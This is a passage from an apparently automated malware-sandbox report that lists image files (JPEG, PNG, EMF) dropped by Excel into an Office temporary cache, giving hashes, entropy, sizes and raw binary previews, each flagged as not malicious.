                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2791E8B4.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A4E0740.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B379A2D.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39A93B7B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F1FF87.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):648132
                                              Entropy (8bit):2.8123660050383266
                                              Encrypted:false
                                              SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                              MD5:E48BF4960F779FF5CD42B9143833B42F
                                              SHA1:7DA5EF13228B3557115ADFAA174E30339B3BB83A
                                              SHA-256:D7AE3B836541DA12D810FA9F15513160FE1CD7F362364A5579058DCAC07D8D0A
                                              SHA-512:F899C259D8BC55392116F12F0BF652358562948037754E17BFABEEF89FAA1B22A60D398249B1B21F5E0845F9691BD70CD5727FBC37257465FC590BD15CF5F25B
                                              Malicious:false
                                              Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................DY$...T.S.-zMY.@..%...0.S.t.S.......S.X.S..N.Z..S...S.....@.S...S..N.Z..S...S. ....yMY..S...S. ............zMY........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........d.S.X.....S...S............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\480E59C3.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E372F4E.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67A5C24A.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CC89F36.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
                                              Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A26CB4E2.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                              Category:dropped
                                              Size (bytes):14198
                                              Entropy (8bit):7.916688725116637
                                              Encrypted:false
                                              SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                              MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                              SHA1:72CA86D260330FC32246D28349C07933E427065D
                                              SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                              SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                              Malicious:false
                                              Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1E599BF.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):84203
                                              Entropy (8bit):7.979766688932294
                                              Encrypted:false
                                              SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                              MD5:208FD40D2F72D9AED77A86A44782E9E2
                                              SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                              SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                              SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                              Malicious:false
                                              Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEB48925.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                              Category:dropped
                                              Size (bytes):8815
                                              Entropy (8bit):7.944898651451431
                                              Encrypted:false
                                              SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                              MD5:F06432656347B7042C803FE58F4043E1
                                              SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                              SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                              SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                              Malicious:false
                                              Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E17CBBC9.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED48C3DC.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):7788
                                              Entropy (8bit):5.5374935868044926
                                              Encrypted:false
                                              SSDEEP:96:wQ2CHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wdTrZuloOSGZboS/C93n+KuI
                                              MD5:4FC415C6424FF953F66A5D5E8BDEC1CA
                                              SHA1:DBB592681E36BB66D6FB8715CF9AFC38E4E73944
                                              SHA-256:AEADE713C14333879F98061E55CF9AF0C211A279A66601DA979D00D41FEFF6EA
                                              SHA-512:40225FAA118A318C4B53D74E5C4B1C6373CD95726DEB8A6FCFD81517B781C43C97B1410089DABDD51E04612921EA4B5DD6094168483233474C94F64EE78CA431
                                              Malicious:false
                                              Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................;.6.).X.......d.......................@.....p....\.....................p........<5.u..p....`.p`m;.$y.w..D................w..D.$.......d.......$....^.p.....^.p..D...D...C.....-........<.w................<.9u.Z.v....X.a....`m;........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F219DE41.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):33795
                                              Entropy (8bit):7.909466841535462
                                              Encrypted:false
                                              SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                              MD5:613C306C3CC7C3367595D71BEECD5DE4
                                              SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                              SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                              SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                              Malicious:false
